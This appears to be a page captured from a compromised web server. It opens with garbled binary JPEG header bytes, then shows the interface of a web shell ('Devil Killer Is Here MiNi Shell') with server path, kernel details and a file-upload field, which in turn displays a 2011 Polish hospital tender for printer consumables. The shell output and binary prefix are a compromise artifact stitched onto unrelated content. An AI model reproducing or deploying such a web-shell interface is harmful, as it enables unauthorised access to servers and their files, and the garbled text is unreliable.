JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110526/149051-N-2011.html

<p class="kh_header"><b>Rzeszów: Dostawa materiałów eksploatacyjnych do drukarek komputerowych, faksów, urządzeń wielofunkcyjnych oraz innych urządzeń</b><br>
<b>Numer ogłoszenia: 149051 - 2011; data zamieszczenia: 26.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Fryderyka Chopina , ul. Szopena 2, 35-055 Rzeszów, woj. podkarpackie, tel. 017 8666 096, faks 017 8666 097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szpital.rzeszow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek komputerowych, faksów, urządzeń wielofunkcyjnych oraz innych urządzeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, faksów i urządzeń wielofunkcyjnych oraz innych urządzeń  dla Wojewódzkiego Szpitala Specjalistycznego im. F. Chopina w Rzeszowie. 
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ. Opis ten należy odczytywać wraz z ewentualnymi zmianami treści SIWZ, będącymi np. wynikiem udzielonych odpowiedzi na zapytania wykonawców. Podane ilości są szacunkowym zapotrzebowaniem na okres 12 miesięcy i służą do obliczenia ceny oferty (tj. ustalenia maksymalnego wynagrodzenia wykonawcy). Dostawy odbywać się będą po cenach jednostkowych określonych przez wykonawcę w ofercie.
2.	Oferowane materiały muszą być w 100% nowe, czyli wykonane z elementów wcześniej nieużywanych, nie mogą być regenerowane, refilowane ani refabrykowane (remanufakturowane) - zamawiający nie dopuszcza zaoferowania materiałów eksploatacyjnych, których proces wytwarzania ogranicza się do czynności napełnienia, uzupełnienia samego wkładu danego materiału eksploatacyjnego (proszku, tuszu itp.) i wymiany zużytych elementów mechanicznych na nowe. 
3.	Oferowane materiały muszą posiadać termin ważności (używalności) nie krótszy, niż 12 miesięcy od dnia dostawy. 
4.	Opakowania materiałów muszą zawierać logo i nazwę producenta, numer katalogowy (symbol), termin ważności lub datę produkcji z okresem używalności, opis zawartości (w tym wykaz urządzeń, do których przeznaczony jest dany materiał), muszą uniemożliwiać kontakt materiału z atmosferą w celu ochrony przed zawilgoceniem.
5.	Równoważne materiały eksploatacyjne do drukarek laserowych i urządzeń wielofunkcyjnych muszą być przeznaczone do danego urządzenia i posiadać wydajność nie mniejszą niż wydajność materiałów oryginalnych. Wydajność musi być zmierzona zgodnie z normą ISO/IEC 19752 (drukarki monochromatyczne) i ISO/IEC 19798 (drukarki kolorowe).
6.	Równoważne materiały eksploatacyjne do drukarek atramentowych muszą być przeznaczone do danego urządzenia i muszą posiadać wydajność nie mniejszą niż wydajność materiałów oryginalnych. Wydajność musi być zmierzona zgodnie z normą ISO/IEC 24711.
7.	   Przez produkty równoważne do urządzeń pozostałych , nie wymienionych w pkt. 5 i 6 powyżej, należy   rozumieć produkty kompatybilne ze sprzętem, do którego są zamawiane, o parametrach takich samych bądź lepszych (pojemność , wydajność i jakość kserokopii, wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia oraz spełniających wymagania z pkt. 2 powyżej.
8.	W przypadku, kiedy materiał oryginalny posiada wbudowany układ scalony, który monitoruje proces druku i zużycie atramentu/tonera, produkt materiał równoważny musi posiadać analogiczny element.
9.	W przypadku, gdy dostarczony materiał równoważny nie będzie odpowiadał jakością wydruków i wydajnością materiałom oryginalnym (np. blady wydruk, brudzenie papieru, mniejsza liczba wydrukowanych stron w stosunku do materiału oryginalnego) wykonawca zobowiązany będzie do wymiany tego materiału na nowy w terminie 1 dnia roboczego.
10.	W przypadku uszkodzenia urządzenia, spowodowanego używaniem zaoferowanych materiałów równoważnych, Wykonawca zobowiązany będzie do naprawy w autoryzowanym serwisie producenta urządzenia na swój koszt, a w przypadku takiej konieczności - także do zwrotu kosztu zleconej przez Zamawiającego ekspertyzy niezależnego rzeczoznawcy. Ponadto Wykonawca zobowiązany będzie do dostarczenia na czas wykonania naprawy, w terminie 2 dni roboczych, urządzenia zastępczego, o takich samych lub lepszych parametrach. W razie stwierdzonego przez autoryzowany serwis producenta urządzenia trwałego i uniemożliwiającego eksploatację uszkodzenia Wykonawca pokryje wszystkie koszty zakupu i dostawy nowego urządzenia, o takich samych lub lepszych parametrach.
11.	W przypadku urządzeń na gwarancji - jeśli na skutek awarii urządzenia wynikłej z winy zastosowania materiałów równoważnych Zamawiający utraci gwarancję producenta urządzenia, wykonawca będzie zobowiązany do przejęcia obowiązków gwaranta na pozostały okres udzielonej gwarancji, bez zmiany jej warunków. 
12.	Wykonawca dostarczy zamówione materiały eksploatacyjne, swoim transportem, w ciągu 2 dni roboczych od złożenia zamówienia pisemnie, faxem lub przez e-mail przez Dział Zaopatrzenia, do siedziby zamawiającego ,  w godz. 07.30 - 15.05 poniedziałek - piątek.
13.	Wymagany minimalny okres gwarancji na przedmiot zamówienia wynosi 12 miesięcy.
 14.  Zamawiający nie dopuszcza składania ofert :
            a) wariantowych,
            b) alternatywnych,
            c) częściowych.


Załącznik nr 1 do SIWZ:

L.p. - Typ posiadanego przez zamawiającego sprzętu - Wymagany asortyment -Przewidywana ilość sztuk  materiałów eksploatacyjnych na 12 m-cy :

1.	HP LaserJet 5000	czarny	4 szt.
2.	HP LaserJet 4015	czarny	4 szt.

3.	HP LaserJet 3300	czarny	4 szt.

4.	HP LaserJet 3150	czarny	5 szt.
5.	HP LaserJet 3052	czarny	5 szt.
6.	HP LaserJet 2420	czarny	5 szt.
7.	HP LaserJet 2300	czarny	5 szt.
8.	HP LaserJet 2200	czarny	15 szt.
9.	HP LaserJet 2100	czarny	15 szt.
10.	HP LaserJet 2055	czarny	10 szt.
11.	HP LaserJet 2035	czarny	6 szt.
12.	HP LaserJet 2015	czarny	20  szt.
13.	HP LaserJet 1320	czarny	30 szt.

14.	HP LaserJet 1300	czarny	12 szt.

15.	HP LaserJet 1200	czarny	10 szt.

16.	HP LaserJet 1160	czarny	4 szt.

17.	HP LaserJet 1100	czarny	8 szt.

18.	HP Laser Jet P 1102	czarny	2 szt.

19.	HP LaserJet 1120	czarny	4 szt.

20.	HP LaserJet 1022	czarny	8 szt.

21.	HP LaserJet 1020	czarny	30 szt.

22.	HP LaserJet 1015	czarny	4 szt.

23.	HP LaserJet 1012	czarny	4 szt.

24.	HP LaserJet 1006	czarny	6 szt.

25.	HP LaserJet 6L	czarny	4 szt.

26.	HP DeskJet 6980	czarny	5 szt.
, kolorowy 3 szt.

27.	HP DeskJet 6940	czarny	2 szt.
, kolorowy 1 szt.

28.	HP DeskJet 5940	czarny	5 szt.
, kolorowy 3 szt.

29.	HP DeskJet 5150	czarny	5 szt.
, kolorowy 2 szt.

30.	HP DeskJet 845c czarny	5 szt.
, kolorowy 2 szt.

31.	HP DeskJet 840c	czarny	3 szt.
, kolorowy 1 szt.

32.	HP DeskJet 710c	czarny	3 szt.
, kolorowy 3 szt.

33.	HP DeskJet 690c	czarny	2 szt.
, kolorowy 1 szt.

34.	HP OfficeJet 5110	czarny	2 szt.
, kolorowy 1 szt.

35.	HP OfficeJet R45	czarny	2 szt.
, kolorowy 1 szt.

36.	HP OfficeJet H470	czarny	2 szt.
, kolorowy 1 szt.

37.	HP OfficeJet 4700	czarny	2 szt.
, żółty	1 szt.
, czerwony 1 szt.
, niebieski 1 szt.

38.	HP Color LaserJet 3600	czarny	3 szt.
, żółty	2 szt.
, czerwony 2 szt.
, niebieski	2 szt.

39.	HP Color LaserJet 2025	czarny	2 szt.
, żółty	1 szt.
, czerwony 1 szt.
, niebieski	1 szt.

40.	HP Color LaserJet 1600	czarny	2 szt.
, czerwony 1 szt.
, niebieski 1 szt.
 szt.
41.	HP Color LaserJet 1515	czarny	2 szt.
, żółty	1 szt.
, czerwony 1 szt.
, niebieski 1 szt.
	42.	Samsung SCX-4828	 czarny	5 szt.

43.	Samsung SCX-4720	 czarny	5 szt.

44.	Samsung SCX -4623	czarny	6 szt.

45.	Samsung SCX -4521	czarny	4
46.	Samsung SCX- 4300	czarny	5 szt.

47.	Samsung CLP-650	czarny	4 szt.
, żółty	1 szt.
, czerwony 1 szt.
, niebieski 1 szt.

48.	Samsung CLP-315 czarny	3 szt.
, żółty	1 szt.
, czerwony 1 szt.
, niebieski 1 szt.

49.	Samsung CLP-310 czarny	12 szt.
, żółty	4 szt.
, czerwony 4 szt.
, niebieski 4 szt.

50.	Samsung CLP-300 czarny	6 szt.
, żółty	2 szt.
, czerwony 2 szt.
, niebieski 2 szt.

51.	Samsung ML-3470	czarny	5 szt.

52.	Samsung ML-2851	czarny	5 szt.

53.	Samsung ML-2850	czarny	6 szt.

54.	Samsung ML-2571	czarny	6 szt.

55.	Samsung ML-2525	czarny	4 szt.

56.	Samsung ML-2240	czarny	4 szt.

57.	Samsung ML-2010	czarny	24 szt.

58.	Samsung ML-1640	czarny	12 szt.

59.	Samsung ML-1630	czarny	4 szt.

60.	Samsung ML-1610	czarny	4 szt.

61.	Samsung ML-1660	czarny	2 szt.

62.	Nashuatec MP 201 SPF	czarny 3 szt.

63.	OKI C5650 czarny	5, żółty	2, czerwony 2, niebieski 2
64.	OKI C3600 czarny	5, żółty	2, czerwony 2, niebieski 2
65.	OKI B6250 czarny	10 szt.

66.	OKI B430	czarny	4 szt.

67.	OKI B410	czarny	16 szt.

68.	OKI 431 dn czarny	5 szt.

69.	OKI B411 dn czarny 4 szt.

70.	OKI 3320	Kartridż	6 szt.
, Taśma	16 szt.

71.	OKI 3321	Kartridż	4 szt.
, Taśma	5 szt.

72.	OKI C510 Color Laser czarny	3 szt.
, żółty	2 szt.
, czerwony 2 szt.
, niebieski 2 szt.

73.	Brother DCP-8060	czarny	4 szt.

74.	Brother HL-5340	czarny	4 szt.

75.	Brother HL-5240	czarny	4 szt.

76.	Brother HL-3040	czarny	4 szt.

77.	Canon fax-L380	czarny	4 szt.

78.	Canon fax -L240	czarny	4 szt.

79.	Canon fax-L-100	czarny	2 szt.

80.	Canon IR2016	czarny	4 szt.

81.	Canon IR 1210	czarny	4 szt.

82.	Canon IR1018	czarny	8 szt.

83.	Canon IR1024A	czarny	2 szt.

84.	Canon IP4300	czarny	4 szt.
, żółty 1 szt.
, czerwony 1 szt.
, niebieski 1 szt.

85.	Canon BJC1000	czarny	2 szt.

86.	Canon Multi Pass L60 czarny	3 szt.

87.	Canon Multi Pass C70 czarny	5 szt.

88.	Canon LBP-810	czarny	5 szt.

89.	Konica Minolta 1216	czarny	4 szt.

90.	Konica Minolta 2223	czarny	3 szt.

91.	Konica Minolta 2400 czarny	2 szt.
, żółty	1 szt.
, czerwony 1 szt.
, niebieski 1 szt.

92.	Infotec 4151	czarny	4 szt.

93.	Develop Ineo 161	czarny	4 szt.

94.	Sharp AR-203E	czarny	4 szt.

95.	Aficio 1515	czarny	6 szt.

96.	Aficio 1305F	czarny	4 szt.

97.	Aficio 1022	czarny	4 szt.

98.	Aficio 1013	czarny	8 szt.

99.	Aficio MP 161	czarny	14 szt.

100.	Aficio DSM 415	czarny	8 szt.

101.	Aficio MP 2000	czarny	6 szt.

102.	Aficio 3045	czarny	5 szt.

103.	Aficio SP C811	czarny	5 szt.

104.	Aficio CL 7000	czarny	5 szt.

105.	Panasonic KX-MB 2025	czarny	5 szt.

106.	Panasonic KX-MB 773	czarny	5 szt.

107.	Panasonic KX-FLB 758	czarny	5 szt.

108.	Panasonic KX-FLM653	czarny	6 szt.

109.	Panasonic KX-FL613	czarny	10 szt.

110. Panasonic KX-FP121 folia termo transferowa 3 szt.

111.	Panasonic KX-FLB803	czarny	3 szt.

112.	Panasonic KX-P3196	czarny	3 szt.

113.	Philips Laser MFD 6050	czarny	3 szt.

114.	Epson FX-1050	czarny	3 szt.

115.	Epson LX-300	czarny	3 szt.

116.	Xerox Phaser 6280 czarny	4 szt.
, żółty	2 szt.
, czerwony	2 szt.
, niebieski	2
117.	Xerox szt.
 Phaser 3600	czarny	5 szt.

118.	Lexmark 4079 PLUS	czarny	3 szt.

119.	Lexmark OPTRA E+	czarny	3 szt.

120.	Lexmark T650	czarny	3 szt.

121.	Lexmark T642	czarny	3 szt.

122.	Lexmark E360	czarny	3 szt.

123.	Lexmark E350	czarny	3 szt.

124.	Lexmark E240	czarny	3 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w tym postępowaniu w wysokości 4000,00 zł.Wadium należy wnieść przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia , że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, należy złożyć w ofercie dokumenty potwierdzające, że oferowane przedmioty zamówienia do drukarek laserowych monochromatycznych, do drukarek laserowych kolorowych, do drukarek atramentowych oraz urządzeń wielofunkcyjnych :  
1.odpowiadają normom ISO/IEC 19752 (drukarki laserowe monochromatyczne, urządzenia wielofunkcyjne), ISO/IEC 19798 (drukarki laserowe kolorowe, urządzenia wielofunkcyjne) oraz ISO/IEC 24711 (drukarki atramentowe).
Na potwierdzenie oświadczenia w pkt. 1 należy dołączyć kserokopie, potwierdzone za zgodność z oryginałem przez osoby uprawnione, zaświadczenia podmiotu  upoważnionego do kontroli jakości potwierdzające, że oferowane przedmioty zamówienia odpowiadają normom ISO/IEC 19752 (drukarki laserowe monochromatyczne, urządzenia wielofunkcyjne), ISO/IEC 19798 (drukarki laserowe kolorowe, urządzenia wielofunkcyjne ) oraz ISO/IEC 24711 (drukarki atramentowe).
Uwaga: wyjaśniamy, że Certyfikat ISO 9001  nie ma związku z wydajnością tuszy i tonerów, nie może więc być wykorzystany do potwierdzenia oświadczenia w pkt.1.

2. oświadczenie wykonawcy wg wzoru na załączniku nr 5 potwierdzające , że wszystkie oferowane produkty :
             a). są wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami zamawiającego, 
                   zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie.
             b). są dopuszczone do obrotu na terytorium Polski oraz, są wytworzone w zgodzie z prawami   
                  patentowymi
             c). podczas użytkowania nie spowodują utraty praw gwarancji producenta urządzenia, do którego są 
                  przeznaczone (jeśli dotyczy) .</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty, sporządzony według wzoru stanowiącego załącznik nr 6 do SIWZ.  
2.Potwierdzenie wniesienia wadium - kserokopia wniesionego wadium wpięta do oferty w kolejności. Wadium wniesione w formie innej niż w pieniądzu należy złożyć w ofercie luzem celem zrealizowania dyspozycji zawartej w art. 46 ustawy Pzp dot. zwrotu wadium.
3.	Jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej, wymagane jest przedstawienie pełnomocnictwa. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie). Pełnomocnictwo to musi w swojej treści jednoznacznie wskazywać uprawnienie do podpisania oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust.1 Pzp zamawiający przewidział możliwośc dokonania zmian umowy w SIWZ oraz określił warunki tych zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. F. Chopina ul.Szopena 2, 35-055 Rzeszów - Dział Zamówień Publicznych pok. nr 9, bud.J.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2011 godzina 09:00, miejsce: Wojewódzki Szpital Specjalistyczny im. F. Chopina ul.Szopena 2, 35-055 Rzeszów - Kancelaria Ogólna, pok. nr 3, bud. C. Godziny pracy Kancelarii: od poniedziałku do piątku od 7:30 do 15:05.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1) Planowany termin otwarcia ofert: 03.06.2011 o godz. 10:00 2) Sygnatura sprawy nadana przez zamawiającego: WSS.IS.XII.252/Z/26/11, Postępowanie nr 33. 3) Nie zamierza się zawierać umowy ramowej. 4) Nie przewiduje się zamówień uzupełniających. 5) W Sekcji III 4.2 punktor trzeci ze względu na program winno być: Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Spółki cywilne przedstawiają zaświadczenie urzędu skarbowego dla wszystkich wspólników oraz zaświadczenie na całą spółkę cywilną z jej nazwą.</p>
